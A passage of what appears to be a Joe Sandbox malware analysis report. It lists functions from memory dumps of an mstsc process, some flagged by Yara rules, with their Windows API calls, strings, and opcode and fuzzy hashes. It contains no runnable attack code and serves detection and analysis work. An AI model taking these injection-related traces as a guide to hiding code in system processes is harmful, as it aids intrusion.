                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                    • String ID: .z`
                                                                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                    • Instruction ID: 2d4e0817c8443f903ef1c354f06224df46c0b170937f898928bd2ea31fb41516
                                                                                                                                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                    • Instruction Fuzzy Hash: A6E04FB12102046BDB14DF99CC45EE777ACEF88750F014555FD0857242C630F910CAF0
                                                                                                                                                                                    Function 0009A632 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A66D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                    • String ID: .z`
                                                                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                                                                    • Opcode ID: 011d5a14d079758ec468c3849b5b85ce3b556b499b037ab08ca49e9c6007fa1e
                                                                                                                                                                                    • Instruction ID: f0762f8310357d90e4027381f6dee2d434ca31901bfa9d77c0ceea947eb697ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: 011d5a14d079758ec468c3849b5b85ce3b556b499b037ab08ca49e9c6007fa1e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DE0D8FA1241815BEB04DF68E4D14DB37D9AF813143144656E85887A07C920D42687B1
                                                                                                                                                                                    Function 00088393 Relevance: 3.2, APIs: 2, Instructions: 168threadwindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008836A
                                                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008838B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                                                    • Opcode ID: a839e97628358e384e86f27fcf2c3254b7c81eb0bddbc990150e9bc55a9e7a7a
                                                                                                                                                                                    • Instruction ID: 1b572216d59a89b5750021fd673db15974259d9ed9f4689e4815fba4e4e70c28
                                                                                                                                                                                    • Opcode Fuzzy Hash: a839e97628358e384e86f27fcf2c3254b7c81eb0bddbc990150e9bc55a9e7a7a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3451C3B1900309AFDB24EF64DC89BEB77E8FB49704F10456DF58997242DB70AA41CBA1
                                                                                                                                                                                    Function 0008830A Relevance: 3.1, APIs: 2, Instructions: 67threadwindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008836A
                                                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008838B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                                                    • Opcode ID: b1954f81e1ed0db928e503ff36089c768fc0449b4f3a75a61ea9935423ce3b62
                                                                                                                                                                                    • Instruction ID: 86a6eb4ec18d7345696a5e2ec7f04f44f36d12713519dd256cffb75137398564
                                                                                                                                                                                    • Opcode Fuzzy Hash: b1954f81e1ed0db928e503ff36089c768fc0449b4f3a75a61ea9935423ce3b62
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1111E531A4022877EF20B6A4AC03FEE775CAB41F54F480155FA44BA1C3EA946A0683E6
                                                                                                                                                                                    Function 00088310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008836A
                                                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008838B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                                                    • Opcode ID: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
                                                                                                                                                                                    • Instruction ID: 339310e7816ee6677ed71e26b38aa137091c1f5ceb856f159559ed380170ccdd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
                                                                                                                                                                                    • Instruction Fuzzy Hash: D6018431A8022877EB20B6949C03FFE776C6B41F50F044115FF44BA1C2EAD46A0647E6
                                                                                                                                                                                    Function 0009A6AD Relevance: 1.5, APIs: 1, Instructions: 44processCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A704
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                                                                    • Opcode ID: fa568aef906adbc91e2322c64b61688136974792ac46f5f4ca0df15262e431cf
                                                                                                                                                                                    • Instruction ID: be3cbddd8df2ed4e7fc770453fdcd05093ef6983cf3d8f42e5ace0f2c7fe1c3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa568aef906adbc91e2322c64b61688136974792ac46f5f4ca0df15262e431cf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D01AFB2211108AFCB54DF89DC80EEB77ADAF8C754F158258FA4D97245C630E951CBA4
                                                                                                                                                                                    Function 0009A6B0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A704
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                    • Instruction ID: 19f9a99672ba2ac00871b2559056ee1503211ea5923d2fde956d3060091d1159
                                                                                                                                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4701B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                                                                                                                                                    Function 00099180 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008F050,?,?,00000000), ref: 000991BC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                    • Opcode ID: c93d5144655a98af27dd9d7755c423c6bc5848ccb9f33eb30c3b4f92d4cc5cda
                                                                                                                                                                                    • Instruction ID: 7778cbb052deaf6c9d160f9307f3b1362cc7e025e829842f923fdde3f9a57666
                                                                                                                                                                                    • Opcode Fuzzy Hash: c93d5144655a98af27dd9d7755c423c6bc5848ccb9f33eb30c3b4f92d4cc5cda
                                                                                                                                                                                    • Instruction Fuzzy Hash: 91E092373903043AEB30659DAC03FE7B39CDB81B25F14002AFA4DEB2C2D595F80142A4
                                                                                                                                                                                    Function 0009A7A0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1D2,0008F1D2,?,00000000,?,?), ref: 0009A7D0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                    • Instruction ID: 503748e752a4dd667a2f48f6c13857ae90e473f5abbcc737b5c6dd4122f84ac3
                                                                                                                                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 20E01AB12102086BDB10DF89CC85EEB37ADAF89750F018165BA0857242C930E8118BF5
                                                                                                                                                                                    Function 0008F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,00088D14,?), ref: 0008F6FB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                                                    • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                                                                                    • Instruction ID: ed2a3b96cedebc315b72bcabaabe6c3ce6085ee93f5df0a30e066fe22c75f057
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 08D0A7717503093BEB10FAA49C03F6632CCAB45B04F490074F948D73C3ED50F4014165

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 0093DA85 Relevance: 56.5, APIs: 31, Strings: 1, Instructions: 490windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EndDialog.USER32 ref: 0093DF1B
                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0093DF45
                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0093DF56
                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0093DF70
                                                                                                                                                                                    • SendMessageW.USER32(?,00001127,?,0000F000), ref: 0093DF8A
                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,?), ref: 0093DFB2
                                                                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0093DFE5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$ClientCursorDialogScreen
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 517287251-2766056989
                                                                                                                                                                                    • Opcode ID: 3642f1687234c8fcf611bc1bc02ab61eef6829a426e6ec01cb0f227497c15a9a
                                                                                                                                                                                    • Instruction ID: 6ccd8914a7adb1b5f38e2a94e217177c9f194a535d8dd53123c637c00f4a094e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3642f1687234c8fcf611bc1bc02ab61eef6829a426e6ec01cb0f227497c15a9a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D028B70609305AFDB298F24DC95E6ABFE9FF88714F00095DFA859A2A1D7B2C940DF41
                                                                                                                                                                                    Function 00912152 Relevance: 40.7, APIs: 19, Strings: 4, Instructions: 472stringregistryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,Delete,?,?,00000000,00000000,?,00912849,?,00000000,00000000,00000000,?), ref: 009121C5
                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,ForceRemove,?,00000000,00000000,?,00912849,?,00000000,00000000,00000000,?), ref: 009121DA
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 009126E4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrcmpi$Close
                                                                                                                                                                                    • String ID: Delete$ForceRemove$NoRemove$Val
                                                                                                                                                                                    • API String ID: 1559394795-1781481701
                                                                                                                                                                                    • Opcode ID: 5e1c75a064d47c09249a17a75b2e5bdcc66c1825d80ade97cbb90d785768280d
                                                                                                                                                                                    • Instruction ID: 7e4897f8ad875924731f5820fae236f4c7b394732a795c1aec15257874a2d361
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e1c75a064d47c09249a17a75b2e5bdcc66c1825d80ade97cbb90d785768280d
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8F1817170831A9BD725EF64C854ABFB7E8AF88B44F00091EF98597290D774DD90CBA2
                                                                                                                                                                                    Function 009199FA Relevance: 30.4, APIs: 7, Strings: 10, Instructions: 673windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00919B4E
                                                                                                                                                                                    • IsIconic.USER32(?), ref: 00919C42
                                                                                                                                                                                    • GetClientRect.USER32(?,?,?), ref: 00919CDA
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00919F0B
                                                                                                                                                                                    • CheckMenuItem.USER32 ref: 00919FCF
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00919D0B
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • put_FullScreen failed!, xrefs: 00919AC1, 00919BCF, 00919C85
                                                                                                                                                                                    • ShowSessionDiagnostics, xrefs: 00919EBE
                                                                                                                                                                                    • QueryInterface failed for IMsRdpExtendedSettings, xrefs: 00919E74, 0091A1F2
                                                                                                                                                                                    • put_Property(UTREG_UI_SHOWSESSIONDIAGNOSTICS) failed!, xrefs: 00919EE4
                                                                                                                                                                                    • put_FullScreen(VARIANT_TRUE) failed!, xrefs: 0091A14D
                                                                                                                                                                                    • HELP_ENTRY_ID_REMOTE_DESKTOP_HELP_BUTTON, xrefs: 0091A055
                                                                                                                                                                                    • ShowGatewayInformation, xrefs: 0091A231
                                                                                                                                                                                    • mshelp://windows/?id=f55326fa-e629-423b-abba-b30f76cc61e6, xrefs: 0091A05A
                                                                                                                                                                                    • put_Property(UTREG_UI_SHOWGATEWAYINFORMATION) failed!, xrefs: 0091A267
                                                                                                                                                                                    • SyncSessionDisplaySettings failed!, xrefs: 00919B21
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Proc$AddressCheckClearClientErrorFreeHandleIconicItemLastLibraryMenuMessageModuleRectTraceVariantWindow
                                                                                                                                                                                    • String ID: HELP_ENTRY_ID_REMOTE_DESKTOP_HELP_BUTTON$QueryInterface failed for IMsRdpExtendedSettings$ShowGatewayInformation$ShowSessionDiagnostics$SyncSessionDisplaySettings failed!$mshelp://windows/?id=f55326fa-e629-423b-abba-b30f76cc61e6$put_FullScreen failed!$put_FullScreen(VARIANT_TRUE) failed!$put_Property(UTREG_UI_SHOWGATEWAYINFORMATION) failed!$put_Property(UTREG_UI_SHOWSESSIONDIAGNOSTICS) failed!
                                                                                                                                                                                    • API String ID: 1785777579-2258313333
                                                                                                                                                                                    • Opcode ID: f8a5426cf9878810bc744bd7ecc87191e8b07b7d5281c6bcf61f5252ffa9e49f
                                                                                                                                                                                    • Instruction ID: f7c93c158d5fd59507e06ddbdb7eadeecf92bdb1b9c97697cfce88acef9de408
                                                                                                                                                                                    • Opcode Fuzzy Hash: f8a5426cf9878810bc744bd7ecc87191e8b07b7d5281c6bcf61f5252ffa9e49f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C42BA31704349AFDB6ACF64C898FE97BAABB49304F14009DF5159A1A2C771ECD1DB42
                                                                                                                                                                                    Function 009569BE Relevance: 30.0, APIs: 10, Strings: 7, Instructions: 286encryptionCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 009569DC
                                                                                                                                                                                    • CertFreeCertificateChain.CRYPT32(00000000,?,?,?,?,00000000,?), ref: 00956CF6
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • attempt to sign with missing certificate/data, xrefs: 00956D20
                                                                                                                                                                                    • 1.3.14.3.2.26, xrefs: 00956B6A
                                                                                                                                                                                    • pbSignedBlob, xrefs: 00956C15
                                                                                                                                                                                    • D, xrefs: 00956B39
                                                                                                                                                                                    • Unable to construct cert chain for signing, xrefs: 00956AA1
                                                                                                                                                                                    • attempt to sign with invalid signer certificate, xrefs: 00956A41
                                                                                                                                                                                    • CertChainContextToArray failed, xrefs: 00956B07
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$AddressCertCertificateChainHandleLibraryModuleProcmemset
                                                                                                                                                                                    • String ID: 1.3.14.3.2.26$CertChainContextToArray failed$D$Unable to construct cert chain for signing$attempt to sign with invalid signer certificate$attempt to sign with missing certificate/data$pbSignedBlob
                                                                                                                                                                                    • API String ID: 2430148879-1874413065
                                                                                                                                                                                    • Opcode ID: cf5a3ec6584f30740b707b9298346cad5892bca9301663602144879c20c69515
                                                                                                                                                                                    • Instruction ID: c629e6affb585a949e544ffbdf28506f02e764a0a959be10581cf7df620cbea5
                                                                                                                                                                                    • Opcode Fuzzy Hash: cf5a3ec6584f30740b707b9298346cad5892bca9301663602144879c20c69515
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DA1FF72608344AFD725CF56C845F667BE9EB88305F44085DFE80AB2A2C7B1DC48DB92
                                                                                                                                                                                    Function 0091C869 Relevance: 28.6, APIs: 8, Strings: 8, Instructions: 554windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadCursorW.USER32 ref: 0091C8FB
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0091C902
                                                                                                                                                                                    • DefWindowProcW.USER32(?,00000117,?,?), ref: 0091CBA6
                                                                                                                                                                                    • IsIconic.USER32(?), ref: 0091CC41
                                                                                                                                                                                      • Part of subcall function 009188BF: IsIconic.USER32(?), ref: 00918904
                                                                                                                                                                                      • Part of subcall function 009188BF: GetWindowPlacement.USER32(?,?), ref: 00918915
                                                                                                                                                                                      • Part of subcall function 009188BF: GetLastError.KERNEL32 ref: 0091891F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CursorIconicWindow$ErrorLastLoadPlacementProc
                                                                                                                                                                                    • String ID: ,$FALSE$HELP_ENTRY_ID_REMOTE_DESKTOP_HELP_BUTTON$SyncSessionDisplaySettings failed$TRUE$e$get_RemoteMonitorCount failed!$mshelp://windows/?id=f55326fa-e629-423b-abba-b30f76cc61e6
                                                                                                                                                                                    • API String ID: 1251360991-567463105
                                                                                                                                                                                    • Opcode ID: 7af3635f8d23cae5e72642151f1519068b9b34da54d6b6e2a05ba05d071547a1
                                                                                                                                                                                    • Instruction ID: b915872b721703250f71d07361846aaca26e22c5a5e66623bdfdaf811371cbcc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7af3635f8d23cae5e72642151f1519068b9b34da54d6b6e2a05ba05d071547a1
                                                                                                                                                                                    • Instruction Fuzzy Hash: C212B5B178830D9FDB299F64C955BFA3BAAAF84300F00446CF542962A1CB75DCD1EB52
                                                                                                                                                                                    Function 0091B319 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 246windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    • LockWindowUpdate.USER32(?), ref: 0091B460
                                                                                                                                                                                    • IsIconic.USER32(?), ref: 0091B48C
                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 0091B49E
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0091B4C3
                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0091B4DA
                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F4,00000000), ref: 0091B4E3
                                                                                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 0091B5B5
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000030), ref: 0091B5E3
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000215), ref: 0091B5F8
                                                                                                                                                                                    • LockWindowUpdate.USER32(00000000), ref: 0091B5FB
                                                                                                                                                                                      • Part of subcall function 0092426E: CopyRect.USER32(?,?), ref: 009242C6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • get_RemoteMonitorLayoutMatchesLocal failed!, xrefs: 0091B43D
                                                                                                                                                                                    • ,, xrefs: 0091B484
                                                                                                                                                                                    • get_RemoteMonitorCount failed!, xrefs: 0091B3E6
                                                                                                                                                                                    • QI for IID_IMsRdpClientNonScriptable5 failed!, xrefs: 0091B37F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Long$LockUpdate$AddressCopyFreeHandleIconicLibraryModulePlacementProcRectShow
                                                                                                                                                                                    • String ID: ,$QI for IID_IMsRdpClientNonScriptable5 failed!$get_RemoteMonitorCount failed!$get_RemoteMonitorLayoutMatchesLocal failed!
                                                                                                                                                                                    • API String ID: 151203323-4160434392
                                                                                                                                                                                    • Opcode ID: 069787be98385cc8febc9545d633e3c05a6ce45fb7bafa54c00c51c54c97f10f
                                                                                                                                                                                    • Instruction ID: b06401a8cd61fe8ba69694bba3f636fa0182d42a7e3fb9fe2a2244420de85f04
